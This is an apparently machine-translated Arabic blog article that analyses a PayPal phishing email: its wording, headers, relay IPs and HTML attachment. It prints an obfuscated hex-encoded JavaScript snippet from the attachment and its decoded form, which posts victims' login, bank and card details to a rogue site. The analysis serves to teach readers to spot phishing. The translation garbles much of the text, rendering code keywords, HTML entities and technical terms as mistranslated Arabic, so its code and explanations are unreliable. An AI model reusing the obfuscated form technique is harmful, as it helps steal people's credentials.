10Sep

الأمن عبر الإنترنت: تحطيم تشريح بريد إلكتروني للتصيد الاحتيالي


في عالم اليوم حيث معلومات الجميع على الانترنت، والتصيد الاحتيالي هو واحد من الهجمات الأكثر شعبية ومدمرة على الانترنت، لأنه يمكنك دائما تنظيف الفيروس، ولكن إذا سرقت التفاصيل المصرفية الخاصة بك، وكنت في ورطة.وفيما يلي تفصيل لأحد هذه الهجمات التي تلقيناها.

لا أعتقد أنه مجرد تفاصيلك المصرفية الهامة: بعد كل شيء، إذا كان شخص ما يكسب السيطرة على تسجيل الدخول الخاص بحسابك لا يعرفون فقط المعلومات الواردة في هذا الحساب، ولكن الاحتمالات هي أن نفس معلومات تسجيل الدخول يمكن استخدامها على مختلفحسابات أخرى.وإذا كانوا يعارضون حساب بريدك الإلكتروني، فيمكنهم إعادة تعيين جميع كلمات المرور الأخرى.

لذلك بالإضافة إلى حفظ كلمات السر قوية ومتغيرة، عليك أن تكون دائما على اطلاع على رسائل البريد الإلكتروني وهمية تنكر على أنها الشيء الحقيقي.في حين أن معظم محاولات التصيد الاحتيالي هواة، وبعضها مقنع جدا لذلك فمن المهم أن نفهم كيفية التعرف عليها على مستوى السطح، وكذلك كيف تعمل تحت غطاء محرك السيارة.

صورة بواسطة أسيراب

فحص ما هو في بلين سيت

مثالنا البريد الإلكتروني، مثل معظم محاولات التصيد الاحتيالي، "يخطر" لك النشاط على حساب باي بال الخاص بك والتي من شأنها، في ظل الظروف العادية، أن تكون مثيرة للقلق.لذلك فإن الدعوة إلى العمل هي التحقق من / استعادة حسابك من خلال تقديم كل قطعة من المعلومات الشخصية التي يمكنك التفكير فيها.مرة أخرى، وهذا هو صيغة جميلة.

في حين أن هناك بالتأكيد استثناءات، إلى حد كبير يتم تحميل كل التصيد الاحتيال والبريد الإلكتروني احتيال مع إشارات حمراء مباشرة في الرسالة نفسها.حتى لو كان النص مقنعا، يمكنك أن تجد عادة العديد من الأخطاء المتناثرة في جميع أنحاء الجسم الرسالة التي تشير إلى أن الرسالة ليست شرعية.

جسم الرسالة

للوهلة الأولى، يعد هذا أحد أفضل رسائل التصيد الاحتيالي التي شاهدتها.لا توجد أخطاء إملائية أو نحوية وقراءة الفعل وفقا لما قد تتوقعه.ومع ذلك، هناك عدد قليل من العلامات الحمراء يمكنك أن ترى عند فحص المحتوى أكثر قليلا عن كثب.

  • "باي بال" - والحالة الصحيحة هي "باي بال"( العاصمة P).يمكنك أن ترى كل من الأشكال المستخدمة في الرسالة.الشركات متعمدة جدا مع العلامات التجارية الخاصة بهم، لذلك فمن المشكوك فيه شيء من هذا القبيل أن تمر عملية التدقيق.
  • "تسمح أكتيفكس" - كم عدد المرات التي رأيت شرعي الأعمال على شبكة الإنترنت حجم بايبال استخدام مكون الملكية التي تعمل فقط على متصفح واحد، وخصوصا عندما تدعم متصفحات متعددة؟بالتأكيد، في مكان ما هناك بعض الشركة يفعل ذلك، ولكن هذا هو العلم الأحمر.
  • "بشكل آمن." - لاحظ كيف لا تصطف هذه الكلمة في الهامش مع بقية نص الفقرة.حتى لو كنت تمتد نافذة أكثر قليلا، فإنه لا التفاف أو الفضاء بشكل صحيح.
  • "باي بال!" - المساحة قبل علامة التعجب تبدو محرجة.مجرد سخر آخر الذي أنا متأكد من أنه لن يكون في بريد إلكتروني شرعي.
  • "PayPal- أكونت أوبديت Form.pdf.htm" - لماذا بايبال إرفاق "بدف" خاصة عندما يمكن فقط ربط إلى صفحة على موقعهم؟بالإضافة إلى ذلك، لماذا يحاولون إخفاء ملف هتمل كملف بدف؟هذا هو أكبر علم أحمر من كل منهم.

رأس الرسالة

عند إلقاء نظرة على رأس الرسالة، تظهر علامات حمراء أكثر:

  • عنوان من العنوان [email protected].
  • العنوان مفقود.لم أكن فارغة هذا الخروج، فإنه ببساطة ليست جزءا من رأس الرسالة القياسية.عادة الشركة التي اسمك سوف تخصيص البريد الإلكتروني لك.

المرفق

عند فتح المرفق، يمكنك أن ترى فورا تخطيط غير صحيح كما يفتقد معلومات النمط.مرة أخرى، لماذا سترسل بايبال بريدا إلكترونيا على شكل هتمل عندما يتمكنون ببساطة من إعطائك رابطا على موقعهم؟

ملاحظة: استخدمنا عارض مرفق هتمل المدمج في غميل لهذا، ولكننا نوصي بعدم فتح المرفقات من المحتالين.أبدا.أبدا.أنها غالبا ما تحتوي على مآثر التي سيتم تثبيت حصان طروادة على جهاز الكمبيوتر الخاص بك لسرقة معلومات حسابك.

التمرير لأسفل أكثر قليلا يمكنك أن ترى أن هذا النموذج يسأل ليس فقط لدينا معلومات تسجيل الدخول باي بال، ولكن للحصول على المعلومات المصرفية وبطاقات الائتمان كذلك.بعض الصور مكسورة.

ومن الواضح أن هذه المحاولة التصيد هو الذهاب بعد كل شيء مع ضربة واحدة.

التحليل الفني

في حين أنه ينبغي أن يكون واضحا جدا استنادا إلى ما هو في الأفق العادي أن هذه هي محاولة التصيد، ونحن الآن ذاهب لكسر ماكياج التقنية للبريد الإلكتروني ونرى ما يمكن أن نجد.

معلومات من المرفق

أول شيء نلقي نظرة عليه هو مصدر هتمل من نموذج المرفق الذي يقدم البيانات إلى موقع وهمية.

عند عرض المصدر بسرعة، تظهر جميع الروابط صالحة لأنها تشير إما إلى "paypal.com" أو "paypalobjects.com" وكلاهما شرعي.

الآن سوف نلقي نظرة على بعض معلومات الصفحة الأساسية التي يجمعها فايرفوكس على الصفحة.

كما ترون، يتم سحب بعض الرسومات من المجالات "blessedtobe.com"، "goodhealthpharmacy.com" و "pic-upload.de" بدلا من المجالات باي بال شرعي.

معلومات من رؤوس البريد الإلكتروني

بعد ذلك سوف نلقي نظرة على رؤوس رسائل البريد الإلكتروني الخام.يجعل غميل هذا متاحا عبر خيار إظهار القائمة الأصلية على الرسالة.

عند الاطلاع على معلومات رأس الرسالة الأصلية، يمكنك مشاهدة هذه الرسالة التي تم إنشاؤها باستخدام أوتلوك إكسبريس 6. أشك في أن لدى بايبال شخصا على الموظفين يرسل كل من هذه الرسائل يدويا عن طريق برنامج بريد إلكتروني قديم.

الآن بالنظر إلى معلومات التوجيه، يمكننا أن نرى عنوان إب لكل من المرسل وخادم البريد الترحيل.

عنوان إب "المستخدم" هو المرسل الأصلي.القيام بحث سريع على المعلومات إب، يمكننا أن نرى إب إرسال في ألمانيا.

وعندما ننظر إلى خادم البريد الترحيل( mail.itak.at)، عنوان إب يمكننا أن نرى هذا هو إيسب مقرها في النمسا.أشك بايبال طرق رسائل البريد الإلكتروني مباشرة من خلال إيسب النمسا مقرها عندما يكون لديهم مزرعة الخادم ضخمة التي يمكن بسهولة التعامل مع هذه المهمة.

أين تذهب البيانات؟

لذا فقد حددنا بوضوح أن هذه رسالة بريد إلكتروني للتصيد الاحتيالي وجمعت بعض المعلومات حول مصدر الرسالة، ولكن ماذا عن مكان إرسال بياناتك؟

لرؤية هذا، علينا أولا حفظ المرفق هتم القيام سطح المكتب لدينا وفتح في محرر النص.التمرير من خلال ذلك، يبدو أن كل شيء في النظام إلا عندما نصل إلى كتلة جافا سكريبت تبحث المشبوهة.

يخرج المصدر الكامل للكتلة الأخيرة من جافاسكريبت، ونرى:

& لوت؛ سكريبت لانغواد = "جافاسكريبت" تايب = "تكست / جافاسكريبت" & غ؛
// حقوق التأليف والنشر © 2005 Voormedia - WWW.VOORMEDIA.COM
فار ط، ص، س = "3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"، ذ = "؛ ل(ط = 0؛ ط العلامة & lt؛ x.length، وأنا + = 2){ ص + = تفادي استبعاد( '٪' + x.substr( ط، 2))؛} دوكمنت( ص)؛
& لوت؛ / سكريبت & غ؛

في أي وقت ترى سلسلة كبيرة مختلطة من الحروف والأرقام التي تبدو عشوائية جزءا لا يتجزأ من كتلة جافا سكريبت، وعادة ما يكون شيئا مشبوها.وعند النظر إلى الشفرة، يتم ضبط المتغير "x" على هذه السلسلة الكبيرة ثم يتم فك الشفرة في المتغير "y".ثم تتم كتابة النتيجة النهائية للمتغير "y" إلى المستند بتنسيق هتمل.

منذ سلسلة كبيرة مصنوعة من الأرقام 0-9 والرسائل بالعربية، وعلى الأرجح ترميز ذلك عن طريق ASCII بسيط لتحويل عشري:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

يترجم إلى:

العلامة & lt؛ اسم النموذج = "الرئيسي" معرف = "الرئيسية"ميثود = "بوست" أكتيون = "هتب: //www.dexposure.net/bbs/data/ verify.php" & غ؛

ليس من قبيل المصادفة أن يقوم هذا بالتحويل إلى علامة نموذج هتمل صالحة التي ترسل النتائج لا إلى بايبال، ولكن إلى موقع المارقة.

بالإضافة إلى ذلك، عند عرض مصدر هتمل للنموذج، سترى أن علامة النموذج هذه غير مرئية لأنها يتم إنشاؤها ديناميكيا عبر جافا سكريبت.هذا هو وسيلة ذكية لإخفاء ما يقوم به هتمل فعلا إذا كان شخص ما لمجرد عرض المصدر الذي تم إنشاؤه من المرفق( كما فعلنا في وقت سابق) بدلا من فتح المرفق مباشرة في محرر نص.

تشغيل وويس سريع على الموقع المخالف، يمكننا أن نرى أن هذا النطاق مستضاف في مضيف ويب شهير، 1 و 1.

ما يبرز هو أن المجال يستخدم اسم قابل للقراءة( على عكس شيء مثل "dfh3sjhskjhw.net") وقد تم تسجيل المجال لمدة 4 سنوات.وبسبب هذا، وأعتقد أن هذا المجال تم الاستيلاء عليها واستخدامها كبيدق في هذه المحاولة التصيد.

السخرية هو الدفاع الجيد

عندما يتعلق الأمر بالبقاء الآمن على الانترنت، فإنه لا يضر أبدا أن يكون قليلا من السخرية.

بينما أنا متأكد من أن هناك المزيد من العلامات الحمراء في المثال البريد الإلكتروني، ما أشرنا إليه أعلاه هي المؤشرات التي رأينا بعد بضع دقائق فقط من الفحص.افتراضيا، إذا كان مستوى سطح البريد الإلكتروني يحاكي نظيره الشرعي 100٪، والتحليل الفني لا تزال تكشف عن طبيعتها الحقيقية.هذا هو السبب في أنها استيراد لتكون قادرة على فحص كل ما يمكنك وما لا يمكن أن نرى.